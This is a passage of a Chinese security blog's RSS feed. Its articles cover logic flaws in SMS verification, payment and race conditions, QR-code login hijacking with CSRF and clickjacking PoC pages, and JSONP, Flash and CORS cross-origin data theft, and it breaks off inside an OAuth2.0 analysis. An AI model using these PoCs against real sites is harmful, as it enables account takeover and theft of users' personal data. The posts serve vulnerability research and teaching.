2.1 6位数验证码时效性为5分钟，但是在这里同一手机号发送的验证码都是一样的，所以可以在4分钟的时候重新发送一次验证码这样验证码就又有效了，因为验证码一直在被复用，所以可以爆破。&lt;/p&gt;

&lt;h5 id=&quot;-3万能验证码&quot;&gt;* 3.万能验证码&lt;/h5&gt;

&lt;p&gt;-场景：
3.1 这是很多大企业的诟病，在未上线前为了方便测试加了&lt;code&gt;888888&lt;/code&gt;、&lt;code&gt;000000&lt;/code&gt;这样的万能验证码但是上线后没去删除测试的内容导致被恶意利用。&lt;/p&gt;

&lt;h2 id=&quot;短信语音验证码重放&quot;&gt;短信/语音验证码重放&lt;/h2&gt;

&lt;p&gt;无论是发送短信还是语音验证码来做验证，都是需要手机号的，而发送验证码实际上是需要成本的，需要跟运营商或者是第三方验证码平台进行合作，多数验证码为0.01元一条，当然也有更便宜的，所以这边的问题也会影响到一个企业的资产方面。&lt;/p&gt;

&lt;h3 id=&quot;常见缺陷&quot;&gt;常见缺陷&lt;/h3&gt;

&lt;h4 id=&quot;-1无限制发送&quot;&gt;* 1.无限制发送&lt;/h4&gt;

&lt;p&gt;-场景：
1.1 厂商对验证码发送这一块并没有进行限制时间发送&lt;/p&gt;

&lt;h4 id=&quot;-2代码层逻辑校验问题&quot;&gt;* 2.代码层逻辑校验问题&lt;/h4&gt;

&lt;p&gt;-场景：
2.1 很多厂商会对手机号进行限制，如果60秒内发送过就不会发送，但是程序员在设计代码层的逻辑时会出现很多奇葩的问题，例如其为了方便用户体验，正常的代码层的流程为：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;a.去除用户手误输入的空格以及一些特殊符号&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;b.验证手机号是否发送过验证码&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;某些程序员会这样设计流程：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;a.验证手机号是否发送过验证码（发送过则不放行 没发送过则进入下一步）&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;b.去除用户手误输入的空格以及一些特殊符号&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;c.发送手机号验证码&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;-3手机号可遍历发送&quot;&gt;* 3.手机号可遍历发送&lt;/h4&gt;

&lt;p&gt;-场景：
3.1 我之前有提到验证码发送会影响到企业资产，那么发送验证码限制就不能仅仅针对于单一手机号的限制，例如我可以载入一堆手机号的字典，然后直接遍历发送验证码，这也是危害之一。&lt;/p&gt;

&lt;h2 id=&quot;业务流程绕过&quot;&gt;业务流程绕过&lt;/h2&gt;

&lt;h3 id=&quot;常见缺陷-1&quot;&gt;常见缺陷&lt;/h3&gt;

&lt;h5 id=&quot;-1无验证步骤跳跃&quot;&gt;* 1.无验证步骤跳跃&lt;/h5&gt;

&lt;p&gt;-场景：
1.1 出现的场景很多：密码重置步骤、支付步骤，对于这种的测试方法有很多中：&lt;/p&gt;

&lt;p&gt;a.对比法，使用A、B两个账号，A账号先正常走一遍流程，然后记录流程的请求报文跟响应报文，使用B账号来测试是否能绕过直接进入最后一步骤。&lt;/p&gt;

&lt;p&gt;b.第六感，假设步骤1的网址为:&lt;code&gt;http://www.test.com/step1&lt;/code&gt;，这时候你可以凭借你的第六感修改下链接为&lt;code&gt;/step2&lt;/code&gt;之类的来测试。&lt;/p&gt;

&lt;h2 id=&quot;加密算法脆弱&quot;&gt;加密算法脆弱&lt;/h2&gt;

&lt;h3 id=&quot;常见缺陷-2&quot;&gt;常见缺陷&lt;/h3&gt;

&lt;h4 id=&quot;-1前端呈现加密算法代码&quot;&gt;* 1.前端呈现加密算法代码&lt;/h4&gt;

&lt;p&gt;-场景：
1.1 很多厂商算法写的很好，可没用，因为他用的是JS代码，在前端会直接能看见，而尝试跟踪JS的代码就会知道是怎么加密的从而可以直接绕过。&lt;/p&gt;

&lt;h4 id=&quot;-2算法脆弱明文可判断&quot;&gt;* 2.算法脆弱，明文可判断&lt;/h4&gt;

&lt;p&gt;-场景：
2.1 这是一个看运气的问题，一段密文为md5的，这时候你要做好自己的分析明文到底是什么，然后去碰撞，例如可能是&lt;strong&gt;md5(用户名+邮箱)&lt;/strong&gt;这样的的组合。&lt;/p&gt;

&lt;h2 id=&quot;支付逻辑漏洞&quot;&gt;支付逻辑漏洞&lt;/h2&gt;

&lt;h3 id=&quot;常见缺陷-3&quot;&gt;常见缺陷&lt;/h3&gt;

&lt;h4 id=&quot;-1金额修改&quot;&gt;* 1.金额修改&lt;/h4&gt;

&lt;p&gt;-场景：
1.1 支付的过程中有很多涉及金额的元素可以修改运费、优惠价、折扣等，可以修改为负数金额也可以修改金额为小于原金额的数进行测试，有时候会遇到&lt;code&gt;溢出&lt;/code&gt;，你修改金额为较大的数看你会出现只支付1元的情况。&lt;/p&gt;

&lt;h4 id=&quot;-2数量修改&quot;&gt;* 2.数量修改&lt;/h4&gt;

&lt;p&gt;-场景：
2.1 修改购买物品的数量为小数或者负数，同上，有时候会遇到&lt;code&gt;溢出&lt;/code&gt;，你修改数量为较大的数看你会出现只支付1元的情况。&lt;/p&gt;

&lt;h4 id=&quot;-3sign值可逆&quot;&gt;* 3.sign值可逆&lt;/h4&gt;

&lt;p&gt;-场景：
3.1 这是一个看运气的问题，sign多数为对比确认金额的一段内容，很多都是md5加密的，这时候你要做好自己的分析明文到底是什么，然后去碰撞，例如可能是&lt;strong&gt;md5(订单号+金额)&lt;/strong&gt;这样的的组合，然后修改金额重新生成sign就可以绕过金额固定的限制了。&lt;/p&gt;

&lt;h2 id=&quot;条件竞争http并发&quot;&gt;条件竞争(HTTP并发)&lt;/h2&gt;

&lt;h3 id=&quot;常见缺陷-4&quot;&gt;常见缺陷&lt;/h3&gt;

&lt;h4 id=&quot;-1条件竞争http并发&quot;&gt;* 1.条件竞争（HTTP并发）&lt;/h4&gt;

&lt;p&gt;-场景：
1.1 在签到、转账、兑换、购买等场景是最容易出现这样的问题，而并发测试的方法可以使用Fiddler也可以使用BurpSuite Intruder模块。&lt;/p&gt;

&lt;p&gt;这里例举下Fiddler测试方法（BurpSuite测试很简单就不说明了）：&lt;/p&gt;

&lt;p&gt;配置好代理，设置好拦截：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-18/0x00.png&quot; alt=&quot;0x00.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;然后点击兑换、转账、签到等最后一步按钮的时候会抓到一个请求，右键这一请求然后按住Shift点击Replay-&amp;gt;Reissue Requests：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-18/0x01.png&quot; alt=&quot;0x01.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;填入要重发的次数：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-18/0x02.png&quot; alt=&quot;0x02.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;一般为20即可，然后点击GO放行：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-18/0x03.png&quot; alt=&quot;0x03.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;最后看你自己来判断是否存在并发的问题，例如签到，如果存在那么肯定是签到天数或者签到所获得的奖励会一下子有很多，也可以看Fiddler中的响应报文结果。&lt;/p&gt;
</description>
          <pubDate>2018-04-18T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-04-18/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-04-18/1</guid>
        </item>
      
    
      
        <item>
          <title>二维码登陆的常见缺陷剖析</title>
          <description>&lt;h1 id=&quot;二维码登陆的常见缺陷剖析&quot;&gt;二维码登陆的常见缺陷剖析&lt;/h1&gt;

&lt;p&gt;现在很多的电商平台和互联网型企业都有自己的手机APP，为了方便用户的体验，于是就有了”扫码登陆”这样的功能。看似扫码登陆，实际上还是基于HTTP请求来完成的。&lt;/p&gt;

&lt;h2 id=&quot;了解扫码登陆步骤&quot;&gt;了解扫码登陆步骤&lt;/h2&gt;

&lt;p&gt;标准的二维码登陆流程如下：&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;打开web界面进入登陆然后加载二维码&lt;/li&gt;
  &lt;li&gt;网站开始轮询，来检测二维码状态&lt;/li&gt;
  &lt;li&gt;打开手机APP进入”扫一扫”，扫描二维码&lt;/li&gt;
  &lt;li&gt;网站检测到二维码被扫描，进入被扫描后的界面，继续轮询来获取凭证&lt;/li&gt;
  &lt;li&gt;手机APP进入确认登陆界面&lt;/li&gt;
  &lt;li&gt;(当点击确认登陆)网站轮询结束获取到了凭证，进入个人中心；(当取消登陆)网站轮询设定时间自动刷新页面。&lt;/li&gt;
&lt;/ol&gt;

&lt;h2 id=&quot;常见缺陷剖析&quot;&gt;常见缺陷剖析&lt;/h2&gt;

&lt;h3 id=&quot;0x00-非标准扫码登陆流程缺陷&quot;&gt;0x00 非标准扫码登陆流程缺陷&lt;/h3&gt;

&lt;h4 id=&quot;非标准流程描述&quot;&gt;非标准流程描述&lt;/h4&gt;

&lt;p&gt;扫描登陆的流程如果不按照标准来做也会存在很多问题，国内一些企业在处理这些的时候省略了如上所述的第五步骤和第六步骤，而是直接扫描后立即登陆。&lt;/p&gt;

&lt;h4 id=&quot;分析非标准流程可能存在的问题&quot;&gt;分析非标准流程可能存在的问题&lt;/h4&gt;

&lt;ul&gt;
  &lt;li&gt;可进行1:1比例诱导扫描&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;二维码是一张图片而图片是可以移植的，所以我们可以1:1克隆一个登陆页面来诱导用户进行扫描，这样就可以直接获取用户的权限了。&lt;/p&gt;

&lt;p&gt;因为保密协议的问题，这里不对漏洞详情进行描述，简单的使用文字进行叙述：&lt;/p&gt;

&lt;p&gt;在测试这种问题的时候，只需要按照步骤去测试下即可发现是否有相对于的问题，我一般会使用浏览器ctrl+s快捷键先克隆下来，因为这样会自带css和js等文件，剩下的只需要你处理一下就行了，也可以参考我之前的文章：&lt;a href=&quot;https://bbs.ichunqiu.com/thread-25923-1-1.html&quot;&gt;微信Netting-QRLJacking分析利用-扫我二维码获取你的账号权限&lt;/a&gt;，方法类似就行，但是这里的微信二维码登录是基于OAuth2.0协议的，所以当用户点击之后，我只要获取到授权凭证链接就行了，而一般的二维码登陆是不基于OAuth2.0协议的，就需要处理好你的交互问题。&lt;/p&gt;

&lt;h3 id=&quot;0x01-qrljacking-二维码登陆劫持&quot;&gt;0x01 QRLJacking-二维码登陆劫持&lt;/h3&gt;

&lt;p&gt;2017年OWASP推出了这种攻击方式：https://www.owasp.org/index.php/Qrljacking&lt;/p&gt;

&lt;p&gt;因为OWASP上有详细的介绍，所以在这里我就不以实际案例来说明了。&lt;/p&gt;

&lt;p&gt;补充的一点是在0x00中我已经说明了之前一篇文章&lt;a href=&quot;https://bbs.ichunqiu.com/thread-25923-1-1.html&quot;&gt;微信Netting-QRLJacking分析利用-扫我二维码获取你的账号权限&lt;/a&gt;，在这里我称之为Netting-QRLJacking是因为我们可以使用钓鱼网站方式的方法进行大面积撒网~而其实这里是利用了OAuth2.0的一个流程特征，我们想进行二维码登录劫持的时候也可以利用”扫码登陆”的流程特征。&lt;/p&gt;

&lt;p&gt;之前已经把”扫码登陆”的流程说的很清楚了，我们知道其中一步轮询是用户点击确认登陆之后就通过轮询这个接口可以直接获得凭证，利用这个特点就行了。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;小提示：&lt;/strong&gt;整个流程划分为一个一个的接口来测试，你会更清楚的。&lt;/p&gt;

&lt;h3 id=&quot;0x02-csrf跨站请求访问&quot;&gt;0x02 CSRF跨站请求访问&lt;/h3&gt;

&lt;p&gt;之在0x01说了，把整个流程划分为一个个的接口来测试，你就会更清楚，其实潜台词就是&lt;strong&gt;“你会发现更多漏洞”&lt;/strong&gt;~&lt;/p&gt;

&lt;p&gt;以一个实际例子来讲解：&lt;/p&gt;

&lt;p&gt;在测试一个站点的时候遇到的问题，其扫码登陆的流程全部为GET类型请求：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;打开web界面进入登陆然后加载二维码&lt;strong&gt;（http://www.gh0stdemo.cn/getqrcode 返回一段uuid 二维码的链接为 http://www.gh0stdemo.cn/qrcode?code=qrcode）&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;网站开始轮询，来检测二维码状态&lt;strong&gt;（http://www.gh0stdemo.cn/getqrlstate?code=qrcode）&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;打开手机APP进入”扫一扫”，扫描二维码&lt;strong&gt;（http://www.gh0stdemo.cn/qrcode?code=qrcode）&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;网站检测到二维码被扫描，进入被扫描后的界面，继续轮询来获取凭证&lt;strong&gt;（http://www.gh0stdemo.cn/getqrlstate?code=qrcode）&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;手机APP进入确认登陆界面&lt;strong&gt;（这步骤必须需要经过第四步骤之后才可以 http://www.gh0stdemo.cn/putqrlstate?code=qrcode）&lt;/strong&gt;&lt;/li&gt;
  &lt;li&gt;(当点击确认登陆)网站轮询结束获取到了凭证，进入个人中心；(当取消登陆)网站轮询设定时间自动刷新页面。&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;在这里我们可以构建这样的PoC：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
	&amp;lt;title&amp;gt;PoC&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;script&amp;gt;
function loadsrc(){
	document.getElementById(&quot;test1&quot;).src=&quot;http://www.gh0stdemo.cn/qrcode?code=qrcode&quot;;
}
setTimeout(&apos;loadsrc()&apos;,1000);
&amp;lt;/script&amp;gt;
&amp;lt;iframe id=&quot;test1&quot; src=&quot;http://www.gh0stdemo.cn/putqrlstate?code=qrcode&quot;&amp;gt;
&amp;lt;/iframe&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;很简单的一个PoC就构成了，这里也确实存在CSRF的问题，可能在这里有人会想到攻击面得问题，仅仅只限于APP端？当然不，其实原理是一样得，都是把自己的凭证(Cookie)发出去，所以在电脑的web端只要登陆了一样可以完成攻击步骤~&lt;/p&gt;

&lt;p&gt;当然在这里也有POST形式的CSRF，因为内容重复度过高就不一一举例了。&lt;/p&gt;

&lt;h3 id=&quot;0x03-clickjacking-点击劫持&quot;&gt;0x03 ClickJacking-点击劫持&lt;/h3&gt;

&lt;p&gt;点击劫持，视觉欺骗&lt;/p&gt;

&lt;p&gt;根据扫码登陆的流程中我们可以看到有一个流程强制的要求了用户去点击确认登陆的按钮，但是这个界面往往没有做点击劫持的防范：&lt;/p&gt;

&lt;p&gt;在我之前的一篇文章中详细讲了PoC的制作方法：http://gh0st.cn/archives/2017-12-20/1&lt;/p&gt;

&lt;p&gt;之前跟一朋友在测试的时候发现了一些问题，有些网站用iframe标签引用进来，不会百分百的自适应，在这里我使用了div为父元素，如何再在div里面写入iframe这个子元素来自适应就行了。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;meta name=&quot;referrer&quot; content=&quot;never&quot;&amp;gt;
&amp;lt;style type=&quot;text/css&quot;&amp;gt; 
.testframe {
	height: 100%;
} 
iframe {
	height: 100%;
	width: 100%;
	border: 0;
	margin: 0;
	padding: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
    filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/
    -moz-opacity: 0; /*提供给火狐浏览器的*/
    -webkit-opacity: 0; /*提供给webkit内核的*/
    -khtml-opacity: 0; /*提供给KHTML内核的*/
    -ms-filter: &quot;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&quot;; /*提供给IE8之后的*/
    opacity: 0;
    /*控制不透明度的属性，兼容各大浏览器*/
}
.btn {
    position: fixed;
    width: 97%;
    height: 42px;
    margin: 0 auto;
    left: 0;
    right:0;
    display:block;
    top: 815px;
} 
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;div class=&quot;testframe&quot;&amp;gt;
	&amp;lt;input type=&quot;button&quot; class=&quot;btn&quot; value=&quot;Click&quot;&amp;gt;
	&amp;lt;iframe src=&quot;http://www.gh0stdemo.cn/qrcode?code=qrcode&quot;&amp;gt;&amp;lt;/iframe&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;示例结果：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-04-08/0x00.png&quot; alt=&quot;/images/2018-04-08/0x00.png&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;结尾&quot;&gt;结尾&lt;/h2&gt;

&lt;p&gt;本文没详细的去写，仅仅记录笔者的实践过程和心得。&lt;/p&gt;
</description>
          <pubDate>2018-04-08T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-04-08/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-04-08/1</guid>
        </item>
      
    
      
        <item>
          <title>读取型CSRF-需要交互的内容劫持</title>
          <description>&lt;h1 id=&quot;前言&quot;&gt;前言&lt;/h1&gt;

&lt;p&gt;最近在挖洞，”实践出真知”这句话说的很对，在实际挖掘过程中我会思考很多东西，跟朋友一起准备做一份手册，忽然的想到了一些漏洞的定义和规范。
在大多数的人眼里CSRF可能仅仅是&lt;strong&gt;写入型&lt;/strong&gt;的比如：修改个人资料、授权登陆等等功能场景的CSRF问题，同时对CSRF这类问题进行了危害等级划分，就像如上两个例子，可以划分为中危和高危。也许是因为交互式的漏洞并没有SQLi这种直接能利用的漏洞危害高，所以一些厂商对CSRF也并不重视。&lt;/p&gt;

&lt;p&gt;步入正题，什么是读取型CSRF，这里我对如下的漏洞归纳进了读取型CSRF，因为这些漏洞的利用手法都跟CSRF是一样的：&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;JSONP劫持&lt;/li&gt;
  &lt;li&gt;Flash跨域劫持&lt;/li&gt;
  &lt;li&gt;CORS跨域资源读取&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;…等等，当然还有Silverlight跨域这些了，不过这里只列举常见的三种来讲解。&lt;/p&gt;

&lt;h1 id=&quot;读取型csrf&quot;&gt;读取型CSRF&lt;/h1&gt;

&lt;p&gt;接下以如上所说的三个漏洞案例来一个个分析。&lt;/p&gt;

&lt;h2 id=&quot;jsonp劫持&quot;&gt;JSONP劫持&lt;/h2&gt;

&lt;h3 id=&quot;漏洞案例&quot;&gt;漏洞案例&lt;/h3&gt;

&lt;p&gt;这里来看一条请求：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-03-22/0x00.png&quot; alt=&quot;jsonp hijacking&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这条请求返回的结果中有手机号（这里我测试的账号没绑定手机），如果我们想要以CSRF交互式攻击的方式获取这个手机号该怎么办？&lt;/p&gt;

&lt;p&gt;来看看这条请求有callback，而返回结果是不是类似Javascript中的函数？&lt;/p&gt;

&lt;p&gt;Javascript原函数定义如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;function funName(){}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这里是缺少了函数定义的关键词&lt;code&gt;function&lt;/code&gt;和花括号的函数主体部分，只有函数名和函数传参，聪明人已经想到了，这不就相当于是自定义函数被引用了么，而中间那段传参就相当于是一个数组，所以我们可以先用JS自定义好这个函数，然后再引用这个请求，自然就可以获取到数据了。&lt;/p&gt;

&lt;p&gt;这时候我们可以来构建一下PoC：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;!-- 引用一段如上请求为JS --&amp;gt;
&amp;lt;script&amp;gt;function jsonp2(data){alert(JSON.stringify(data));}&amp;lt;/script&amp;gt;
&amp;lt;script src=&quot;http://gh0st.cn/user/center?callback=jsonp2&quot;&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;使用正常的账号(绑定过手机号)来测试下：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-03-22/0x01.png&quot; alt=&quot;jsonp hijacking&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;案例总结&quot;&gt;案例总结&lt;/h3&gt;

&lt;p&gt;其实通过这个例子，我们可以知道HTML标签&lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt;在一定的情况下是可以跨域读取的。&lt;/p&gt;

&lt;p&gt;对此漏洞的修复有很多：&lt;/p&gt;

&lt;p&gt;1.打乱响应主体内容&lt;/p&gt;

&lt;p&gt;2.Referer等进行限制&lt;/p&gt;

&lt;p&gt;…..等等&lt;/p&gt;

&lt;h2 id=&quot;flash跨域劫持&quot;&gt;Flash跨域劫持&lt;/h2&gt;

&lt;p&gt;Flash跨域比较经典了，在做web目录资产整理的时候有时候会发现这样的文件 &lt;strong&gt;crossdomain.xml&lt;/strong&gt; ，文件内容如果是如下的，那么就存在Flash跨域问题，如下内容的意思是支持所有域：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-xml&quot;&gt;&amp;lt;?xml version=&quot;1.0&quot;?&amp;gt;
&amp;lt;cross-domain-policy&amp;gt;
  &amp;lt;allow-access-from domain=&quot;*&quot; /&amp;gt;
&amp;lt;/cross-domain-policy&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;为什么会如此？具体流程是这样的：&lt;/p&gt;

&lt;p&gt;gh0st.cn 有一个SWF文件，这个文件是想要获取 vulkey.cn 的 userinfo 的返回响应主体，SWF首先会看在 vulkey.cn 的服务器目录下有没有 &lt;strong&gt;crossdomain.xml&lt;/strong&gt; 文件，如果没有就会访问不成功，如果有 &lt;strong&gt;crossdomain.xml&lt;/strong&gt; ，则会看&lt;strong&gt;crossdomain.xml&lt;/strong&gt; 文件的内容里面是否设置了允许 gh0st.cn 域访问，如果设置允许了，那么 gh0st.cn 的SWF文件就可以成功获取到内容。所以要使Flash可以跨域传输数据，其关键就是&lt;strong&gt;crossdomain.xml&lt;/strong&gt; 文件。&lt;/p&gt;

&lt;p&gt;当你发现 &lt;strong&gt;crossdomain.xml&lt;/strong&gt; 文件的内容为我如上所示的内容，那么就是存在Flash跨域劫持的。&lt;/p&gt;

&lt;h3 id=&quot;漏洞案例-1&quot;&gt;漏洞案例&lt;/h3&gt;

&lt;p&gt;在对一个厂商进行测试的时候正好发现了这样的文件：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-03-22/0x02.png&quot; alt=&quot;flash hijacking&quot; /&gt;&lt;/p&gt;

&lt;p&gt;在这里我需要做两件事：&lt;/p&gt;

&lt;p&gt;1.找到一个能获取敏感信息的接口&lt;/p&gt;

&lt;p&gt;2.构建PoC&lt;/p&gt;

&lt;p&gt;在这里敏感的信息接口以个人中心为例子，PoC使用的是 https://github.com/nccgroup/CrossSiteContentHijacking/raw/master/ContentHijacking/objects/ContentHijacking.swf&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-03-22/0x03.png&quot; alt=&quot;flash hijacking&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;案例总结-1&quot;&gt;案例总结&lt;/h3&gt;

&lt;p&gt;很简单的一个东西，但是用处却很大，其利用方法跟CSRF也是一样的，只需要修改下PoC就行。&lt;/p&gt;

&lt;p&gt;修复方案同样也很简单，针对&lt;code&gt;&amp;lt;allow-access-from domain=&quot;*&quot; /&amp;gt;&lt;/code&gt;的domain进行调整即可。&lt;/p&gt;

&lt;h2 id=&quot;cors跨域资源读取&quot;&gt;CORS跨域资源读取&lt;/h2&gt;

&lt;h3 id=&quot;漏洞案例-2&quot;&gt;漏洞案例&lt;/h3&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-03-22/0x04.png&quot; alt=&quot;CORS&quot; /&gt;&lt;/p&gt;

&lt;p&gt;如上图中我在请求的时候加上了请求头 &lt;code&gt;Origin: http://gh0st.cn&lt;/code&gt;，而对应的响应包中出现了&lt;code&gt;Access-Control-Allow-Origin: http://gh0st.cn&lt;/code&gt;这个响应头其实就是访问控制允许，在这里是允许http://gh0st.cn的请求的，所以http://gh0st.cn是可以跨域读取此网址的内容的~在这里我介绍下&lt;code&gt;Origin&lt;/code&gt;：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Origin&lt;/code&gt;和&lt;code&gt;Referer&lt;/code&gt;很相似，就是将当前的请求参数删除，仅剩下&lt;strong&gt;三元组（协议 主机 端口）&lt;/strong&gt;，标准的浏览器，会在每次请求中都带上&lt;code&gt;Origin&lt;/code&gt;，至少在跨域操作时肯定携带（例如ajax的操作）。&lt;/p&gt;

&lt;p&gt;所以要测试是否存在CORS这个问题就可以参考我上面的操作手法了。&lt;/p&gt;

&lt;p&gt;怎么利用呢？在这里我使用了github上的开源项目:https://github.com/nccgroup/CrossSiteContentHijacking，readme.md中有具体的说明，这里我就不一一讲解了，那么已经确认问题了，那就需要进一步的验证。&lt;/p&gt;

&lt;p&gt;在这里我找到了一处接口，其响应主体内容是获取用户的真实姓名、身份证、手机号等内容：&lt;/p&gt;

&lt;p&gt;/daren/author/query （要注意的是这个请求在抓取的时候是POST请求方式，但并没有请求正文，经过测试请求正文为任意内容即可）&lt;/p&gt;

&lt;p&gt;响应报文正文内容：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-03-22/0x05.png&quot; alt=&quot;CORS&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里CrossSiteContentHijacking项目我搭建在了本地(127.0.0.1) http://127.0.0.1/CrossSiteContentHijacking/ContentHijackingLoader.html&lt;/p&gt;

&lt;p&gt;根据项目所说的操作去进行参数的配置，然后点击 Retrieve Contents 按钮：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-03-22/0x06.png&quot; alt=&quot;CORS&quot; /&gt;&lt;/p&gt;

&lt;p&gt;测试如下，测试结果是可以跨域读取的：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-03-22/0x07.png&quot; alt=&quot;CORS&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;案例总结-2&quot;&gt;案例总结&lt;/h3&gt;

&lt;p&gt;这个问题其实就是对Origin的验证没有控制好，对其进行加强即可。&lt;/p&gt;

&lt;h1 id=&quot;结尾&quot;&gt;结尾&lt;/h1&gt;

&lt;p&gt;结尾想说的东西其实也没什么了，总结了这些东西希望能帮助到各位~&lt;/p&gt;
</description>
          <pubDate>2018-03-22T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-03-22/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-03-22/1</guid>
        </item>
      
    
      
        <item>
          <title>OAuth2.0认证缺陷-第三方帐号快捷登录授权劫持漏洞</title>
          <description>&lt;h1 id=&quot;什么是oauth20&quot;&gt;&lt;strong&gt;什么是OAuth2.0？&lt;/strong&gt;&lt;/h1&gt;

&lt;blockquote&gt;
  &lt;p&gt;OAuth2.0是OAuth协议的下一版本，但不向后兼容OAuth 1.0即完全废止了OAuth1.0。 OAuth 2.0关注客户端开发者的简易性。要么通过组织在资源拥有者和HTTP服务商之间的被批准的交互动作代表用户，要么允许第三方应用代表用户获得访问的权限。同时为Web应用，桌面应用和手机，和起居室设备提供专门的认证流程。2012年10月，OAuth 2.0协议正式发布为RFC 6749 。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;RFC 6749 : https://tools.ietf.org/html/rfc6749&lt;/strong&gt;&lt;/p&gt;

&lt;h1 id=&quot;qq-oauth20-流程分析攻击&quot;&gt;&lt;strong&gt;QQ OAuth2.0 流程分析&amp;amp;攻击&lt;/strong&gt;&lt;/h1&gt;

&lt;p&gt;国内的很多厂商使用了OAuth2.0的认证方式，这里以QQ为例。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;QQ互联 : https://connect.qq.com/intro/login&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;相信大家在很多网站上都见过如下的登陆界面：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-02-12/0x00.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;可以看见除了厂商本身网站的账号以外还有QQ跟微信这两个快捷登陆，首先以QQ的快捷登陆为例子：&lt;/p&gt;

&lt;p&gt;点击QQ图标进入登陆的链接 -&amp;gt; &lt;strong&gt;https://graph.qq.com/oauth2.0/show?which=Login&amp;amp;display=pc&amp;amp;response_type=code&amp;amp;client_id=100273020&amp;amp;redirect_uri=http://a.com/?view=null&amp;amp;uuid=65392bc3fc724fca8dcba23558f67ec8&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-02-12/0x01.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里因为我的QQ是在电脑上已经登陆了，所以我可以直接进行登陆，这时候进行抓包截取整个流程，&lt;/p&gt;

&lt;h1 id=&quot;关键流程分析&quot;&gt;&lt;strong&gt;关键流程分析&lt;/strong&gt;&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Request 1：&lt;/strong&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-http&quot;&gt;POST /oauth2.0/authorize HTTP/1.1
Host: graph.qq.com
